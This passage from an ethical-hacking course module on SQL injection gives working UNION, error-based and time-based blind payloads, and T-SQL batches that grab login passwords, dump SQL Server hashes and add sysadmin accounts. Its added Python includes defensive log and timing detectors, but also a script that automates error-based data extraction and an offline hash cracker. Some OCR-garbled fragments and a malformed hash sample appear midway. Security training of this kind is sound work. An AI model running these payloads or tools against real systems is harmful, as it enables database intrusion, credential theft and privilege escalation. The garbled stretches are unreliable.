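        query = target.partition("?")[2]
        for pair in query.split("&"):
            if not pair:
                continue
            key, _, raw = pair.partition("=")
            hits = classify(raw)
            if hits:
                findings.append((client, key, hits))
    return findings


# Constructed access-log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    "203.0.113.5 GET /page.aspx?id=1 200",
    "203.0.113.5 GET /page.aspx?id=1%27+AND+1%3D1-- 200",
    "198.51.100.7 GET /login.aspx?user=admin%27-- 302",
    "198.51.100.7 GET /search.aspx?q=UNI%2F%2A%2A%2FON+SEL%2F%2A%2A%2FECT+1%2C2%2C3 500",
    "203.0.113.9 GET /page.aspx?id=1%3B+WAITFOR+DELAY+%2700%3A00%3A10%27-- 200",
    "192.0.2.4 GET /search.aspx?q=cats+or+dogs 200",
    "192.0.2.4 GET /search.aspx?q=%22+or+isnull%281%2F0%29+%2F%2A 500",
]

if __name__ == "__main__":
    for client, key, hits in scan_log(SAMPLE_LOG):
        print(f"{client} parameter {key!r}: {', '.join(hits)}")
```

The boolean rule requires an operator after the OR/AND operand, so a search for "cats or dogs" passes while ' OR '7659'='7659 (the decoded form of the %27+OR+ string above) is flagged; each rule name maps back to one family of testing strings, which keeps alerts explainable.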
Module Flow
So far, we have discussed various SQL injection concepts and how to test web applications for SQL injection. Now we will discuss various types of SQL injection. SQL injection attacks are performed in many different ways by poisoning the SQL query that is used to access the database.
[Figure: module flow diagram: SQL Injection Concepts, Advanced SQL Injection, Evasion Techniques, Countermeasures]
This section gives insight into the different ways to handle SQL injection attacks. Some simple SQL injection attacks, including blind SQL injection attacks, are explained with the help of examples.
Types of SQL Injection
SQL injection is an attack in which malicious code is injected through a SQL query, which can read sensitive data and even modify (insert/update/delete) the data. SQL injection is mainly classified into two types:
[Figure: classification diagram: SQL Injection divided into Blind SQL Injection and Simple SQL Injection; Simple SQL Injection divided into UNION SQL Injection and Error Based SQL Injection]
Blind SQL Injection: Wherever there is a web application vulnerability, blind SQL injection can be used either to access the sensitive data or to destroy the data. The attacker can steal the data by asking a series of true or false questions through SQL statements.
Simple SQL Injection: A simple SQL injection script builds a SQL query by concatenating hard-coded strings together with a string entered by the user. Simple SQL injection is again divided into two types:
    UNION SQL Injection: UNION SQL injection is used when the user uses the UNION command. The attacker checks for the vulnerability by adding a tick to the end of a ".php?id=" file.
    Error Based SQL Injection: The attacker makes use of the database-level error messages disclosed by an application. This is very useful to build a vulnerability exploit request.
Union Query
The "UNION SELECT" statement returns the union of the intended dataset with the target dataset:
    SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable
After injecting code into a particular field, legitimate code that follows is nullified through usage of end of line comments.
Tautology
Injecting statements that are always true (such as 1=1) so that queries always return results upon evaluation of a WHERE condition.
[EMPLOYEE_TABLE] Returned from the server
Extract Table Column Names
This is the example of union SQL injection that an attacker uses to extract table column names:
    http://juggyboy.com/page.aspx?id=1 UNION SELECT ALL 1, column_name, 3, 4 from DB_NAME.information_schema.columns where table_name = 'EMPLOYEE_TABLE'--
[EMPLOYEE_NAME] Returned from the server
Extract 1st Field Data
This is the example of union SQL injection that an attacker uses to extract field data:
    http://juggyboy.com/page.aspx?id=1 UNION SELECT ALL 1, COLUMN-NAME-1, 3, 4 from EMPLOYEE_NAME--
[FIELD 1 VALUE] Returned from the server
Extract 1st Database Table
The following is the code to extract the first database table through the SQL injection error-based method:
    http://juggyboy.com/page.aspx?id=1 or 1=convert(int, (select top 1 name from sysobjects where xtype=char(85)))
    Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.
Extract 1st Field Of 1st Row (Data)
The following is the code to extract the first field of the first row (data) through the SQL injection error-based method:
    http://juggyboy.com/page.aspx?id=1 or 1=convert(int, (select top 1 COLUMN-NAME-1 from TABLE-NAME-1))
    Syntax error converting the nvarchar value ...
Module Flow
Previously we discussed various types of SQL injection attacks. Now we will discuss each type of SQL injection attack in detail. Let us begin with the blind SQL injection attack. Blind SQL injection is a method that is implemented by the attacker when a server responds with an error message stating that the syntax is incorrect.
[Figure: module flow diagram: SQL Injection Concepts, Evasion Techniques, Countermeasures]
This section introduces and gives a detailed explanation of blind SQL injection attacks.
[Figure: an application returning a detailed database error: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /shopping/buy.aspx, line 52]
[Figure: an application returning only a generic error page: Oops! We are unable to process your request. Please try back later.]
Since no error messages are returned, use the 'waitfor delay' command to check the SQL execution status.
If the table "users" contains a column "pass" and the first character of the first entry in this column is 97 (letter "a"), then the DBMS will return TRUE; otherwise, FALSE.
Searching for the second character of the first table entry:
    /?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),2,1))=97,555,777)
If the table "users" contains a column "pass" and the second character of the first entry in this column is 97 (letter "a"), then the DBMS will return TRUE; otherwise, FALSE.
Finding a full username of 8 characters using the binary search method takes 56 requests.
Check for username length:
    http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'
Check if the 3rd character in the username is 'A' (a=97), 'B' (98), 'C' (99), etc.:
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=97) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=98) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=99) WAITFOR DELAY '00:00:10'
Extract the table name (Table Name = EMP):
    http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=3) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=101) WAITFOR DELAY '00:00:10'--
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=109) WAITFOR DELAY '00:00:10'--
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=112) WAITFOR DELAY '00:00:10'
time-based blind SQL injection method. Here, the attacker can brute force the database name by noting the time before the query executes and the time after it completes; from the result, if the time lapse is 10 seconds, then the name can be 'A'; otherwise, if it took 2 seconds, then it can't be 'A'.
Extract the column names of table EMP:
    http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP')=3) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP'),1,1)))=101) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP'),2,1)))=105) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP'),3,1)))=100) WAITFOR DELAY '00:00:10'--
Extract the first value of column EID in table EMP:
    http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 EID from EMP)=3) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(substring((SELECT TOP 1 EID from EMP),1,1))=106) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(substring((SELECT TOP 1 EID from EMP),2,1))=111) WAITFOR DELAY '00:00:10'
    http://juggyboy.com/page.aspx?id=1; IF (ASCII(substring((SELECT TOP 1 EID from EMP),3,1))=101) WAITFOR DELAY '00:00:10'
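Two defender-side checks for the time-based technique above, as an added example written for this page (not code from the slides): the request budget the slide quotes (56 requests for an 8-character name, on the assumption of 7 binary-search steps per character over a 7-bit alphabet), and a log scan that flags a client whose service times cluster at the injected delay, which works whatever the payload looks like on the wire. The log records, client addresses and paths are constructed.

```python
"""Detecting time-based blind probing from server-side timing. Added example;
the records below are constructed and the endpoint names are placeholders."""
import math
from collections import defaultdict


def requests_for_binary_search(name_length, alphabet_size=128):
    """Requests needed to recover a name character by character with binary
    search: ceil(log2(alphabet)) probes per character. Eight characters over
    a 7-bit alphabet gives the 56 requests quoted on this page."""
    return name_length * math.ceil(math.log2(alphabet_size))


# Constructed records: (client, path, service_time_seconds)
SAMPLE_RECORDS = [
    ("203.0.113.9", "/page.aspx", 10.1),
    ("203.0.113.9", "/page.aspx", 0.2),
    ("203.0.113.9", "/page.aspx", 10.0),
    ("203.0.113.9", "/page.aspx", 9.9),
    ("203.0.113.9", "/page.aspx", 0.3),
    ("203.0.113.9", "/page.aspx", 10.2),
    ("203.0.113.9", "/page.aspx", 0.2),
    ("198.51.100.7", "/page.aspx", 0.1),
    ("198.51.100.7", "/page.aspx", 0.2),
    ("198.51.100.7", "/page.aspx", 0.3),
    ("192.0.2.4", "/report.aspx", 10.3),  # one slow report, not a probe
]


def find_delay_probes(records, delay=10.0, tolerance=0.5, min_hits=3):
    """Group requests by (client, path) and flag groups with at least min_hits
    requests whose service time sits within tolerance of the injected delay.
    WAITFOR DELAY '00:00:10' yields a cluster near 10 s; a single slow page
    does not. Returns {(client, path): (slow_count, total_count)}."""
    groups = defaultdict(list)
    for client, path, seconds in records:
        groups[(client, path)].append(seconds)
    flagged = {}
    for key, times in groups.items():
        slow = sum(1 for t in times if abs(t - delay) <= tolerance)
        if slow >= min_hits:
            flagged[key] = (slow, len(times))
    return flagged


if __name__ == "__main__":
    print("requests for an 8-character name:", requests_for_binary_search(8))
    for (client, path), (slow, total) in find_delay_probes(SAMPLE_RECORDS).items():
        print(f"{client} {path}: {slow}/{total} requests near the 10 s delay")
```

The mix of near-10 s and sub-second responses from one client to one page is the signature: each probe that evaluates TRUE pays the delay and each FALSE returns immediately, so a timing histogram for that client splits into two clusters while ordinary users stay in one.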
Module Flow
Attackers follow a methodology to perform SQL injection attacks to ensure that they check every possible way of performing these attacks. This increases the likelihood of successful attacks.
[Figure: module flow diagram: SQL Injection Concepts, Advanced SQL Injection, Evasion Techniques, Countermeasures]
This section provides insight into the SQL injection methodology. It describes the steps used by the attacker to perform SQL injection attacks.
SQL Injection Methodology
[Figure: methodology steps: Information Gathering, Launch SQL Injection Attacks, Extract the Data]
the attacker can log in to the other associated networks. He or she installs Trojans and other keyloggers, etc.
Module Flow
Prior to this, we have discussed the SQL injection methodology. Now we will discuss
[Figure: module flow diagram: SQL Injection Methodology, Evasion Techniques, Countermeasures]
This section explains each step involved in advanced SQL injection.
Information Gathering
Error Messages
Error messages are essential for
[Figure: information to gather: Database Types, Privilege Level, OS Interaction, SQL Query]
Grouping Error
The HAVING command allows further defining a query based on the "grouped" fields. The error message will tell you which columns have not been grouped:
    ' group by columnnames having 1=1 --
Type Mismatch
Try to insert strings into numeric fields; the error messages will show you the data that could not get converted:
    ' union select 1,1,'text',1,1,1 --
    ' union select 1,1,bigint,1,1,1 --
Blind Injection
The attacker uses time delays or error signatures to extract information:
    ' if condition waitfor delay '0:0:5' --
    '; union select if(condition, benchmark(100000, sha1('test')), 'false'), 1,1,1,1;
Injections
Most injections will land in the middle of a SELECT statement. In a SELECT clause, we almost always end up in the WHERE section.
Select Statement
    SELECT * FROM table WHERE x = 'normalinput' group by x having 1=1 --
    GROUP BY x
    HAVING x = y
    ORDER BY x
Determining Database Engine Type
Most error messages will show you what database engine you are working with:
    ODBC errors will display the database type as part of the driver information.
    If you do not receive any ODBC error message, make an educated guess based on the operating system and web server.
Determining a SELECT Query Structure
To understand the SQL query, try to replicate error-free navigation as follows:
    Could be as simple as ' and '1' = '1 or ' and '1' = '2
    Generate specific errors
    Determine table and column names: ' group by columnnames having 1=1 --
    Do we need parentheses? Is it a subquery?
This gives specific types of errors that give you more information about the table name and parameters in the query.
Try these at website login forms:
MD5 Hash Password
You can union results with a known password and the MD5 hash of a supplied password. The web application will compare your password and the supplied MD5 hash instead of the MD5 from the database.
Bypassing MD5 Hash Check Example
    Username : admin
    Password : 1234
    ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
    81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
Login as a different user:
    ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
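The login check behind the MD5 bypass above, as an added example written for this page (it is not the slides' code): the vulnerable version compares the supplied password against whatever hash the query returned, which a UNION can supply; the fixed version binds the username as a parameter so only a stored hash can ever be compared. The users table and its rows are constructed, SQLite stands in for the site's database, and MD5 is kept only because the slide uses it; it is not a suitable password hash.

```python
"""Login check open to the UNION/MD5 bypass, beside a fixed version.
Added example with a constructed users table; SQLite stands in for the site's
database. MD5 is used only to mirror the slide; a real application should
store passwords with a slow, salted password hash instead."""
import hashlib
import hmac
import sqlite3


def md5_hex(text):
    """Hex MD5 of a string, as the slide's web application computes it."""
    return hashlib.md5(text.encode()).hexdigest()


def build_db():
    """In-memory database with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pass_md5 TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", md5_hex("correct horse")),
                      ("carol", md5_hex("pa55word"))])
    return conn


def login_vulnerable(conn, username, password):
    """Username is concatenated into the query and the hash is taken from the
    first row returned. A UNION in the username makes that row attacker
    supplied, so the hash of a password the attacker knows is compared against
    itself. Returns the logged-in username or None."""
    sql = "SELECT username, pass_md5 FROM users WHERE username = '" + username + "'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return None
    return row[0] if row[1] == md5_hex(password) else None


def login_fixed(conn, username, password):
    """Bound parameter: the username can only ever select a real row, so the
    hash compared is the stored one. compare_digest avoids timing leaks."""
    sql = "SELECT username, pass_md5 FROM users WHERE username = ?"
    row = conn.execute(sql, (username,)).fetchone()
    if row is None:
        return None
    return row[0] if hmac.compare_digest(row[1], md5_hex(password)) else None


# The slide's payload: 81dc9bdb52d04dc20036dbd8313ed055 is MD5("1234").
BYPASS_USERNAME = "' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", login_vulnerable(db, BYPASS_USERNAME, "1234"))
    print("fixed:     ", login_fixed(db, BYPASS_USERNAME, "1234"))
```

Against the concatenated query the payload yields a row ('admin', MD5("1234")) that the real table never contained, so the password "1234" passes; against the bound parameter the same string is looked up as a literal username, finds nothing, and the login fails.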
DB Administrators
Default administrator accounts include sa, system, sys, dba, admin, root, and many others. The dbo is a user who has implied permissions to perform all activities in the database. Any object created by any member of the sysadmin fixed server role belongs to dbo automatically.
Discover DB Structure
You can discover the DB structure as follows:
    Determine table and column names: ' group by columnnames having 1=1 --
    Discover column name types: ' union select sum(columnname) from tablename --
    Enumerate user defined tables: ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
Column Enumeration in DB
You can perform column enumeration in the DB as follows:
    MS SQL: SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')
            sp_columns tablename
    MySQL: show columns from tablename
    Oracle: SELECT * FROM all_tab_columns WHERE table_name='tablename'
    DB2: SELECT * FROM syscat.columns WHERE tabname='tablename'
    Postgres: SELECT attnum,attname from pg_class, pg_attribute WHERE relname='tablename' AND pg_class.oid=attrelid AND attnum > 0
CEH
MS SQL Server
sysobjects syscolumns
t t
systypes sysdatabases
r a
Tables and columns enumeration in one query
.trrn '
t\
SQL Server
' union se le c t 0, sy so b je c ts.name + : ' + syscolumns.name + + systypes.name, 1 , 1 , ' 1 ' , 1 , 1 , 1 , 1 , 1 from sy so b jects, syscolumns, systypes where sy so b je c ts.xtype = U' A N D sy so b je c ts. id syscolumns. id A N D syscolumns. xtype = sy sty p es.xtype Different databases in Server
Database Enumeration
Advanced Enumeration
Attackers use advanced enumeration techniques for information gathering. The information gathered is again used to for gaining unauthorized access. Password cracking methods like calculated hashes and precomputed hashes with the help of various tools like John the Ripper, Cain & Abel, Brutus, cURL, etc. crack passwords. Attackers use buffer overflows for determining the various vulnerabilities of a system or network. The following are some of the metadata tables for different databases: 1. Advanced enumeration through Oracle Q SYS.USER_OBJECTS
Tables and columns enumeration in one query (SQL Server):
' union select 0, sysobjects.name + ':' + syscolumns.name + ':' + systypes.name, 1, 1, '1', 1, 1, 1, 1, 1 from sysobjects, syscolumns, systypes where sysobjects.xtype = 'U' AND sysobjects.id = syscolumns.id AND syscolumns.xtype = systypes.xtype --
The join returns one row per user-table column as table:column:type; the trailing literals pad the UNION out to the column count of the original query.

Database Enumeration
Different databases in the server: ' and 1 in (select min(name) from master.dbo.sysdatabases where name > '.') --
File location of databases: ' and 1 in (select min(filename) from master.dbo.sysdatabases where filename > '.') --
As with table enumeration, each value returned in the conversion error replaces '.' in the next request until no more rows come back.
Features of Different DBMSs

                        MySQL                         MS SQL        MS Access    Oracle     DB2                        PostgreSQL
String concatenation    concat(,) concat_ws(delim,)   ' '+' '       " "&" "      ' '||' '   " "concat" " or " "+" "    ' '||' '
Comments                -- and /*                     -- and /*     No           --         --                         -- and /*
Request union           union                         union and ;   union        union      union                      union and ;
Sub-requests            v.4.1 >= Yes                  Yes           No           Yes        Yes                        Yes
Stored procedures       No                            Yes           No           Yes        No                         Yes
information_schema      v.5.0 >= Yes                  Yes           No           Yes        Yes                        Yes
(or its analogs)

"union and ;" means the DBMS also accepts stacked queries (a second statement after a semicolon); where only union is listed, the injected statement must be a UNION SELECT with the same number of columns as the original query.

Example (MySQL): SELECT * from table where id = 1 union select 1,2,3
Example (PostgreSQL): SELECT * from table where id = 1; select 1,2,3
Example (Oracle): SELECT * from table where id = 1 union select null,null,null from sys.dual

Oracle requires a FROM clause on every SELECT, hence sys.dual, and the column types on both sides of the UNION must be compatible, which is why NULL placeholders are used until the real column types are known.
Copyright by EG-GlOOCil. All Rights Reserved. Reproduction Is Strictly Prohibited.
M ySQ L
MS Access
&
Oracle
"
DB2
" concat II ll+ ll 1
PostgreSQL
concat(,) concat_ws(delim,)
" II"
, II '
and /* No and /* and /*
Request
Union
union
union and;
union
union
union
union and;
v.4.1 > =
Yes
No
Yes
Yes
Yes
No
Yes
No
Yes
No
Yes
v.5.0 > =
Yes
Yes
Yes
Yes
Yes
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
9 a e
Example (MySQL): SELECT * from table where id = 1 union select 1,2,3 Example (PostgreSQL): SELECT * from table where id = 1; select 1,2,3 Example (Oracle): SELECT * from table where id = 1 union select null,null,null from sys.dual
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Creating Database Accounts

MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost', PASSWORD('Pass123'))
A row inserted directly into mysql.user is not honoured until FLUSH PRIVILEGES runs (or the server restarts). From MySQL 5.7 the column is named authentication_string, and the PASSWORD() function was removed in 8.0.
You can also create accounts from the MySQL client. Log in as the root user with mysql -u root -p, press Enter and type the root password when prompted (or pass it inline as mysql -u root -p<password>, replacing <password> with the root password). Then, at the mysql prompt, create the desired database and grant a user rights on it:
CREATE DATABASE testing;
GRANT ALL ON testing.* TO 'tester'@'localhost' IDENTIFIED BY 'password';
This assumes that you are working on the machine where the database is located; replace 'password' with the password you wish to use.

Microsoft SQL Server
exec sp_addlogin 'victor', 'Pass123'
exec sp_addsrvrolemember 'victor', 'sysadmin'
Through the GUI: click Start, point to Programs, point to Microsoft SQL Server, and then click Enterprise Manager. In SQL Server Enterprise Manager, expand Microsoft SQL Servers, expand SQL Server Group, expand <SQL cluster name>, expand Security, right-click Logins, and then click New Login. In the SQL Server Login Properties - New Login dialog box, on the General tab, in the Name box, type <domain name>\<account name>, and then click OK. Repeat this procedure for all remaining accounts you need to create.

Oracle
CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
GRANT CONNECT TO victor;
GRANT RESOURCE TO victor;
Through the Oracle LSH administration screens: click the Database Account sub tab under the Administration tab (the Database Account screen opens), then click Create (the Create Database Account screen opens). Enter values in the following fields: User Name (click the Search icon and enter search criteria for the Oracle LSH user for whom you are creating a database account), Database Account Name (a user name for the database account; the text you enter is stored in uppercase), Password (8 characters or more for the definer to use with the database account) and Confirm Password. Click Apply; the system returns you to the Database Account screen.

Microsoft Access
CREATE USER victor IDENTIFIED BY 'Pass123'
Through the GUI: click the New button on the toolbar. In the New File task pane, under Templates, click My Computer. On the Databases tab, click the icon for the kind of database you want to create, and then click OK. In the File New Database dialog box, specify a name and location for the database, click Create, and follow the instructions in the Database Wizard.
Password Grabbing
Attackers grab passwords through various methods. The following T-SQL is used for password grabbing; once the passwords are grabbed, the attacker might destroy the data or steal it, and at times may even succeed in escalating privileges up to the admin level. Grabbing user names and passwords from a user-defined table:

'; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp) --
'; drop table temp --

The first injection concatenates every login/password pair into a single string and stores it in a new table; the second compares that string with the integer 1, so SQL Server echoes it inside the type-conversion error; the third removes the evidence.

Sample contents of the users table:
User Name   Password
John        asd@123
Rebecca     qwert123
Dennis      pass@321
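The two-step retrieval above (stage the result in a temporary table, then force it into an integer comparison so it is echoed in the conversion error) is limited by how much of the string one error message shows, which is why later slides read the staged value back with substring(x, offset, 256). As an added example, not part of the original module, the Python below automates that loop: it builds the offset payloads, scrapes the leaked value out of each SQL Server-style error page and reassembles the string. The vulnerable site is a constructed stand-in (FakeVulnerableApp) that holds the temp table's contents; the error text it returns is the one SQL Server 2000 prints for a varchar-to-int conversion.

```python
"""Reassemble a long string pulled through SQL Server conversion errors, 'width' characters per request.
Added example; the web application below is a constructed stand-in, not the module's code."""
import re
from typing import Callable, Optional

# Text SQL Server 2000 returns when a varchar is compared with an int: this is the leak channel.
CONVERSION_ERROR = "Syntax error converting the varchar value '{val}' to a column of data type int."
_ERROR_RX = re.compile(r"varchar value '(.*)' to a column of data type int\.", re.S)


def chunk_payload(offset: int, width: int, table: str = "temp", column: str = "x") -> str:
    """Same shape as the slides' payload: ' and 1 in (select substring(x,1,256) from temp) --"""
    return f"' and 1 in (select substring({column},{offset},{width}) from {table}) --"


def extract_chunk(response: str) -> Optional[str]:
    """Pull the leaked value out of the error page, or None if no conversion error appeared."""
    m = _ERROR_RX.search(response)
    return m.group(1) if m else None


def chunked_extract(send: Callable[[str], str], width: int = 256, max_chunks: int = 1000) -> str:
    """Walk the string from offset 1 (T-SQL substring is 1-based) until a short or empty chunk."""
    pieces = []
    offset = 1
    for _ in range(max_chunks):
        chunk = extract_chunk(send(chunk_payload(offset, width)))
        if chunk is None:
            break            # an empty substring converts to int 0 silently: end of data
        pieces.append(chunk)
        if len(chunk) < width:
            break
        offset += width
    return "".join(pieces)


class FakeVulnerableApp:
    """Constructed stand-in for the injectable page. It holds the temp table the injected loop
    created and mimics SQL Server: substring() results that parse as int compare quietly,
    anything else raises the conversion error that leaks the text."""
    _RX = re.compile(r"substring\(x,(\d+),(\d+)\) from temp")

    def __init__(self, temp_x: str):
        self.temp_x = temp_x

    def __call__(self, payload: str) -> str:
        m = self._RX.search(payload)
        if not m:
            return "<html>1 row(s) returned</html>"
        offset, width = int(m.group(1)), int(m.group(2))
        piece = self.temp_x[offset - 1: offset - 1 + width]
        try:
            int(piece) if piece else 0      # '' and all-digit chunks convert without error
            return "<html>1 row(s) returned</html>"
        except ValueError:
            return "<html>" + CONVERSION_ERROR.format(val=piece) + "</html>"


# Constructed temp-table contents in the format the password-grabbing loop produces.
SAMPLE_X = ": | john/asd@123 | rebecca/qwert123 | dennis/pass@321"


def demo(width: int = 16) -> str:
    """Extract SAMPLE_X through the fake application in chunks of 'width' characters."""
    return chunked_extract(FakeVulnerableApp(SAMPLE_X), width=width)


if __name__ == "__main__":
    print(demo())
```

One caveat the code makes visible: a chunk that happens to consist only of digits converts to int without error, so the extractor would stop early and silently drop it. The ':' and ' | ' separators the injected loop inserts make that unlikely for real data, but a small width and a numeric column can trigger it.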
Grabbing SQL Server Hashes
SQL query: SELECT name, password FROM sysxlogins
To display the hashes through an error message, convert each hash to hex and concatenate them. Reading the password field requires sysadmin (dba) access; with lower privileges you can still recover user names and brute force the passwords. sysxlogins exists only on SQL Server 2000; on 2005 and later the hashes live in sys.sql_logins (password_hash) and the format differs. SQL Server hash sample:
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD5406U9FFF04129A1D72E7C31S4F7284A7F3A

The hashes are extracted using: SELECT password FROM master..sysxlogins
You then hex each hash with the following injected batch. The outer loop walks the logins by their xdate1 timestamp; the inner loop converts each byte of the varbinary to two hex digits by splitting it into a high and a low nibble and indexing into '0123456789ABCDEF':

'; begin declare @var varchar(8000), @xdate1 datetime, @binvalue varbinary(255), @charvalue varchar(255), @i int, @length int, @hexstring char(16)
set @var=':'
select @xdate1=(select min(xdate1) from master.dbo.sysxlogins where password is not null)
begin
  while @xdate1 <= (select max(xdate1) from master.dbo.sysxlogins where password is not null)
  begin
    select @binvalue=(select password from master.dbo.sysxlogins where xdate1=@xdate1), @charvalue='0x', @i=1, @length=datalength(@binvalue), @hexstring='0123456789ABCDEF'
    while (@i<=@length)
    begin
      declare @tempint int, @firstint int, @secondint int
      select @tempint=CONVERT(int, SUBSTRING(@binvalue,@i,1))
      select @firstint=FLOOR(@tempint/16)
      select @secondint=@tempint - (@firstint*16)
      select @charvalue=@charvalue + SUBSTRING(@hexstring,@firstint+1,1) + SUBSTRING(@hexstring,@secondint+1,1)
      select @i=@i+1
    end
    select @var=@var+' | '+name+'/'+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1
    select @xdate1 = (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@xdate1 and password is not null)
  end
  select @var as x into temp
end
end --

Extract the hashes through error messages, 256 characters at a time:
' and 1 in (select x from temp) --
' and 1 in (select substring(x, 256, 256) from temp) --
' and 1 in (select substring(x, 512, 256) from temp) --
'; drop table temp --

Note that substring() is 1-based, so offsets 256 and 512 repeat the last character of the previous chunk; use 257 and 513 if you want the chunks to butt up exactly.
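As an added example (not part of the original module), the following Python parses the ': | name/0x... | name/0x...' string that the batch above builds and attacks SQL Server 2000 hashes offline. It re-implements the pwdencrypt() layout used by SQL Server 2000 (0x0100, a 4-byte salt, SHA-1 of the UTF-16LE password plus salt, then SHA-1 of the upper-cased password plus salt); the second, case-insensitive half is what makes "brute force the password" cheap, since each dictionary word needs one hash and the exact case is recovered afterwards from the first half. The login names, salt, passwords and word list are constructed for the example.

```python
"""Offline attack on SQL Server 2000 login hashes recovered via error-based injection.
Added example: not part of the original module; names, salt and passwords are constructed."""
import hashlib
import re
from itertools import product
from typing import Dict, Iterable, Optional

HEADER = b"\x01\x00"   # every SQL Server 2000 pwdencrypt() hash starts with 0x0100


def mssql2000_pwdencrypt(password: str, salt: bytes) -> bytes:
    """Re-implementation of the SQL Server 2000 hash layout:
    0x0100 | 4-byte salt | SHA1(UTF-16LE(pw) + salt) | SHA1(UTF-16LE(UPPER(pw)) + salt)."""
    if len(salt) != 4:
        raise ValueError("salt must be 4 bytes")
    case_sensitive = hashlib.sha1(password.encode("utf-16-le") + salt).digest()
    case_insensitive = hashlib.sha1(password.upper().encode("utf-16-le") + salt).digest()
    return HEADER + salt + case_sensitive + case_insensitive


def parse_dump(blob: str) -> Dict[str, bytes]:
    """Split the ': | name/0x... | name/0x...' string built by the injected T-SQL loop
    into {login: raw_hash}. Entries that are not 46-byte 0x0100 hashes are skipped."""
    logins = {}
    for m in re.finditer(r"\|\s*([^/|]+?)\s*/0x([0-9A-Fa-f]+)", blob):
        raw = bytes.fromhex(m.group(2))
        if raw[:2] == HEADER and len(raw) == 46:
            logins[m.group(1)] = raw
    return logins


def case_variants(word: str) -> Iterable[str]:
    """All upper/lower spellings of word (2**letters candidates)."""
    choices = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in word]
    for combo in product(*choices):
        yield "".join(combo)


def crack(stored: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Test each word once against the case-insensitive half; only on a hit
    enumerate case variants against the case-sensitive half to recover the exact password."""
    salt, cs_hash, ci_hash = stored[2:6], stored[6:26], stored[26:46]
    for word in wordlist:
        if hashlib.sha1(word.upper().encode("utf-16-le") + salt).digest() != ci_hash:
            continue
        for candidate in case_variants(word):
            if hashlib.sha1(candidate.encode("utf-16-le") + salt).digest() == cs_hash:
                return candidate
    return None


# Constructed dump in the shape the injected batch produces, after the chunks are reassembled.
SALT = bytes.fromhex("34767d5c")
DUMP = (": | sa/0x" + mssql2000_pwdencrypt("Tr0ub4dor&3", SALT).hex().upper()
        + " | victor/0x" + mssql2000_pwdencrypt("Pass123", SALT).hex().upper())
WORDLIST = ["password", "letmein", "pass123", "admin"]


def crack_dump(blob: str = DUMP, wordlist: Iterable[str] = WORDLIST) -> Dict[str, Optional[str]]:
    """Parse the dump and try the word list against every login; None means not in the list."""
    words = list(wordlist)
    return {login: crack(raw, words) for login, raw in parse_dump(blob).items()}


if __name__ == "__main__":
    for login, pw in crack_dump().items():
        print(f"{login}: {pw if pw else '<not in wordlist>'}")
```

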